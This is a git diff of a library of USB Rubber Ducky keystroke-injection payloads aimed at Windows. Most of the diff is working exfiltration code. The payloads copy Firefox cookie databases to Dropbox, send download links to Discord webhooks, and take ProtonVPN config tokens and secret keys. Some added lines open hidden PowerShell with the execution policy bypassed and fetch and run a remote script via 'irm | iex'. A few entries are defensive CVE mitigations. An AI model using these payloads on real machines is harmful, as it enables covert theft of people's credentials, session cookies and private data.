+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+####################################################
+END_REM
REM Requirements:
REM - Firefox must be installed
-
REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
-DEFINE DROPBOX_ACCESS_TOKEN "example"
+DEFINE #DROPBOX_ACCESS_TOKEN "example"
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-DELAY 500
-ENTER
+STRINGLN powershell
DELAY 2000
-
REM Get cookies DB path
STRINGLN
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
@@ -33,14 +71,8 @@ STRINGLN
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
-END_STRINGLN
-
-REM Setting about exfiltration
-STRING $accessToken =
-STRING DROPBOX_ACCESS_TOKEN
-ENTER
+ $accessToken = #DROPBOX_ACCESS_TOKEN
-STRINGLN
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$dropboxFilePath = "/cookies_exported.sqlite"
diff --git a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
index 0f88392a6..62b6d05a9 100644
--- a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
+++ b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
@@ -1,26 +1,68 @@
-REM ####################################################################
-REM # |
-REM # Title : Export all saved certificates with Adobe Reader |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ####################################################################
-
+REM_BLOCK
+####################################################################
+# #
+# Title : Export all saved certificates with Adobe Reader #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+####################################################################
+END_REM
REM Requirements:
REM - Adobe Reader must be installed
REM - Internet Connection
-
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 1000
-STRING PowerShell
+STRINGLN PowerShell
DELAY 2000
REM Settings about Adobe Reader
diff --git a/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt b/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt
index c8a8bcd39..517cd702b 100644
--- a/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt
+++ b/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt
@@ -1,20 +1,63 @@
-REM ###########################################################
-REM # |
-REM # Title : Exports all the links of the downloads |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10/11 |
-REM # |
-REM ###########################################################
-
+REM_BLOCK
+###########################################################
+# #
+# Title : Exports all the links of the downloads #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10/11 #
+# #
+###########################################################
+END_REM
REM Requirements:
REM - Firefox installed
-
REM You must define your Discord webhook if you want to use this method for the exfiltration
-DEFINE DISCORD_WEBHOOK example
+DEFINE #DISCORD_WEBHOOK example
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Firefox
GUI
@@ -49,9 +92,7 @@ DELAY 10000
STRINGLN "
REM Exfiltration using Discord Webhook
-STRING $WebhookUrl = "
-STRING DISCORD_WEBHOOK
-STRINGLN "
+STRINGLN $WebhookUrl = "#DISCORD_WEBHOOK"
STRINGLN $Payload = @{content = $DOWNLOADS} | ConvertTo-Json
diff --git a/payloads/library/exfiltration/ProtonVPN-config/payload.txt b/payloads/library/exfiltration/ProtonVPN-config/payload.txt
index 796d694f4..aa1f6d959 100644
--- a/payloads/library/exfiltration/ProtonVPN-config/payload.txt
+++ b/payloads/library/exfiltration/ProtonVPN-config/payload.txt
@@ -1,43 +1,83 @@
-REM ###################################################################
-REM # |
-REM # Title : ProtonVPN-config-to-Discord-Exfiltration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Credentials, Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###################################################################
-
-REM Title: ProtonVPN-config-to-Discord-Exfiltration
-REM Author: Aleff
-REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
-REM In the config file you can find a lot information about the user like:
-REM - UserUid
-REM - UserAccessToken
-REM - UserRefreshToken
-REM - UserAuthenticationPublicKey
-REM - UserAuthenticationSecretKey
-REM - UserAuthenticationCertificatePem
-REM - UserCertificationServerPublicKey
-REM - and so on...
-REM Then it cleans up traces of what you have done after.
-REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
-REM Version: 1.0
-REM Category: Credentials, Exfiltration
-REM Requirements: ProtonVPN user logged at least one time and internet connection
-REM
+REM_BLOCK
+###################################################################
+# #
+# Title : ProtonVPN-config-to-Discord-Exfiltration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Credentials, Exfiltration #
+# Target : Windows 10-11 #
+# #
+###################################################################
+
+Title: ProtonVPN-config-to-Discord-Exfiltration
+Author: Aleff
+Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
+ In the config file you can find a lot information about the user like:
+ - UserUid
+ - UserAccessToken
+ - UserRefreshToken
+ - UserAuthenticationPublicKey
+ - UserAuthenticationSecretKey
+ - UserAuthenticationCertificatePem
+ - UserCertificationServerPublicKey
+ - and so on...
+ Then it cleans up traces of what you have done after.
+Target: Windows 10-11 (PowerShell + ProtonVPN software)
+Version: 1.0
+Category: Credentials, Exfiltration
+Requirements: ProtonVPN user logged at least one time and internet connection
+END_REM
+
+REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
+DEFINE #PAYLOAD example.com
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks//
-DEFINE WEBHOOK example.com
+DEFINE #WEBHOOK example.com
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
DELETE
-STRING powershell -w h -ep bypass $discord='
-STRING WEBHOOK
-
-REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
-DEFINE PAYLOAD example.com
-STRING ';irm PAYLOAD | iex
-ENTER
+STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';irm #PAYLOAD | iex
diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
index 955e368a4..5a813a2f8 100644
--- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
+++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
@@ -41,18 +41,12 @@ I used the [DETECT_READY](https://shop.hak5.org/blogs/usb-rubber-ducky/detect-re
Github
-
-
-
-
-
Instagram
- |
-
Discord
+
Linkedin
|
-
+
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
index 452d12031..0f6747468 100644
--- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
+++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
@@ -1,12 +1,14 @@
-REM ###########################################################
-REM # |
-REM # Title : Tree Structure Of The Operating System |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###########################################################
+REM_BLOCK
+###########################################################
+# #
+# Title : Tree Structure Of The Operating System #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+###########################################################
+END_REM
REM Requirements:
REM - Internet connection
diff --git a/payloads/library/exfiltration/Windows-netstat/payload.txt b/payloads/library/exfiltration/Windows-netstat/payload.txt
index 8728395ae..c2133e392 100644
--- a/payloads/library/exfiltration/Windows-netstat/payload.txt
+++ b/payloads/library/exfiltration/Windows-netstat/payload.txt
@@ -1,45 +1,84 @@
-REM ###################################################################
-REM # |
-REM # Title : Windows-netstat-to-Discord-Exfiltration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Net, Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###################################################################
-
-REM Title: Windows-netstat-to-Discord-Exfiltration
-REM Author: Aleff
-REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
-REM Put 1 on the function that you want to active, else 0. Functions available:
-REM - default (simple 'netstat' command)
-REM - routing_table $r
-REM - listening_canonical $lc
-REM - listening_numerical $ln
-REM - all_canonical $ac
-REM - all_numerical $an
-REM - offload ot
-REM - proto $p ""
-REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
-
-REM Target: Windows 10-11 (PowerShell)
-REM Version: 1.0
-REM Category: Net, Exfiltration
-REM Requirements: Internet connection
-REM
+REM_BLOCK
+###################################################################
+# #
+# Title : Windows-netstat-to-Discord-Exfiltration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Net, Exfiltration #
+# Target : Windows 10-11 #
+# #
+###################################################################
+
+Title: Windows-netstat-to-Discord-Exfiltration
+Author: Aleff
+Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
+Put 1 on the function that you want to active, else 0. Functions available:
+- default (simple 'netstat' command)
+- routing_table $r
+- listening_canonical $lc
+- listening_numerical $ln
+- all_canonical $ac
+- all_numerical $an
+- offload ot
+- proto $p ""
+- - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
+
+Target: Windows 10-11 (PowerShell)
+Version: 1.0
+Category: Net, Exfiltration
+Requirements: Internet connection
+END_REM
REM REQUIRED - Provide your Discord WEBHOOK
-DEFINE WEBHOOK https://discordapp.com/api/webhooks//
+DEFINE #WEBHOOK https://discordapp.com/api/webhooks//
+
+REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
+DEFINE #PAYLOAD example.com
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
DELETE
-STRING powershell -w h -ep bypass $discord='
-
-STRING WEBHOOK
-
-REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
-DEFINE PAYLOAD example.com
-STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
-ENTER
+STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm #PAYLOAD | iex
diff --git a/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt b/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt
index 2f387638d..e86dc0120 100644
--- a/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt
+++ b/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt
@@ -1,13 +1,14 @@
-REM #############################################################################################
-REM # #
-REM # Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : incident-response #
-REM # Target : Cisco IOS XE #
-REM # #
-REM #############################################################################################
-
+REM_BLOCK
+#############################################################################################
+# #
+# Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : incident-response #
+# Target : Cisco IOS XE #
+# #
+#############################################################################################
+END_REM
REM Set the script name, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
DEFINE #SCRIPT-NAME auto-check.sh
@@ -75,17 +76,17 @@ STRINGLN
done' > #PATH-TO-SCRIPT#SCRIPT-NAME
END_STRINGLN
-
-
REM To avoid some bad DELAY I decided to use only one command row
-REM Old script
-REM STRINGLN sudo chmod +x #SCRIPT-NAME
-REM DELAY 500
-REM STRINGLN #SUDO-PSWD
-REM DELAY 3000
-REM STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
-REM STRINGLN exit
+REM_BLOCK
+Old script:
+ STRINGLN sudo chmod +x #SCRIPT-NAME
+ DELAY 500
+ STRINGLN #SUDO-PSWD
+ DELAY 3000
+ STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
+ STRINGLN exit
+END_REM
REM Optimized script
STRINGLN sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit
diff --git a/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt b/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt
index 9bb09a834..0cb57d158 100644
--- a/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt
+++ b/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt
@@ -1,34 +1,79 @@
-REM #######################################################################################################################
-REM # |
-REM # Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Incident Response |
-REM # Target : Windows 10/11 |
-REM # |
-REM #######################################################################################################################
+REM_BLOCK
+#######################################################################################################################
+# #
+# Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Incident Response #
+# Target : Windows 10/11 #
+# #
+#######################################################################################################################
-REM PlugAndPlay <3
+PlugAndPlay <3
-REM Requirements:
-REM - ExecutionPolicy Bypass
+Requirements:
+ - ExecutionPolicy Bypass
-REM Impact: Remote Code Execution
-REM Max Severity: Important
+Impact: Remote Code Execution
+Max Severity: Important
-REM Mitigation:
+Mitigation:
-REM - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
+ - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
-REM - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
+ - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
-REM The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
+The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
-REM It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
+It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
-REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
+Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
+END_REM
+
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI x
DELAY 500
STRING a
diff --git a/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt b/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt
index 8e9ae563d..7c6ec5a66 100644
--- a/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt
+++ b/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt
@@ -1,25 +1,27 @@
-REM ########################################################
-REM # |
-REM # Title : Defend Yourself From CVE-2023-23397 |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Incident-Response |
-REM # Target : Windows 10/11 |
-REM # |
-REM ########################################################
-
-REM PlugAndPlay <3
-
-REM Requirements:
-REM - ExecutionPolicy Bypass
-REM - PayloadStudio 1.3.1
-
-REM Impacted Products:
-REM - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
-
-REM Mitigation:
-REM - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
-REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
+REM_BLOCK
+########################################################
+# #
+# Title : Defend Yourself From CVE-2023-23397 #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Incident-Response #
+# Target : Windows 10/11 #
+# #
+########################################################
+
+PlugAndPlay <3
+
+Requirements:
+ - ExecutionPolicy Bypass
+ - PayloadStudio 1.3.1
+
+Impacted Products:
+ - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
+
+Mitigation:
+ - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
+ Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
+END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
index 8b2495e02..564217675 100644
--- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
@@ -1,12 +1,14 @@
-REM ################################################################################
-REM # #
-REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : incident-response #
-REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
-REM # #
-REM ################################################################################
+REM_BLOCK
+################################################################################
+# #
+# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : incident-response #
+# Target : Citrix NetScaler ADV; NetScaler Gateway #
+# #
+################################################################################
+END_REM
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
DEFINE #HOSTNAME example
diff --git a/payloads/library/prank/Alien Message From Computer/payload.txt b/payloads/library/prank/Alien Message From Computer/payload.txt
index ec205f09f..5713691ba 100644
--- a/payloads/library/prank/Alien Message From Computer/payload.txt
+++ b/payloads/library/prank/Alien Message From Computer/payload.txt
@@ -1,39 +1,79 @@
+REM_BLOCK
+####################################################
+# #
+# Title : Alien Message From Computer #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+####################################################
-REM ####################################################
-REM # |
-REM # Title : Alien Message From Computer |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10/11 |
-REM # |
-REM ####################################################
+Plug-And-Play <3
+Requirements:
+ - Internet Connection
+ - ExecutionPolicy Bypass
+ - Python
+END_REM
-REM Plug-And-Play <3
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
-REM Requirements:
-REM - Internet Connection
-REM - ExecutionPolicy Bypass
-REM - Python
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
